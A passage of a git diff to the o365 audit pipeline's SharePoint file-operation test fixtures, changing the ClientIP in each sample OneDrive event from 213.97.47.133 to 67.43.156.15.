10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json index 4d4cc44c86c..0e31ff8b060 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json @@ -2,10 +2,10 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", @@ -33,10 +33,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", @@ -64,10 +64,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "CreationTime": "2020-02-07T16:44:08", "EventSource": "SharePoint", @@ -95,10 +95,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "CreationTime": "2020-02-07T16:44:08", "EventSource": "SharePoint", @@ -126,10 +126,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "CreationTime": "2020-02-07T16:44:21", "EventSource": "SharePoint", @@ -158,10 +158,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", @@ -189,10 +189,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", @@ -220,10 +220,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "CreationTime": "2020-02-07T16:44:21", "EventSource": "SharePoint", @@ -252,10 +252,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", @@ -283,10 +283,10 @@ }, { "event": { - "original": 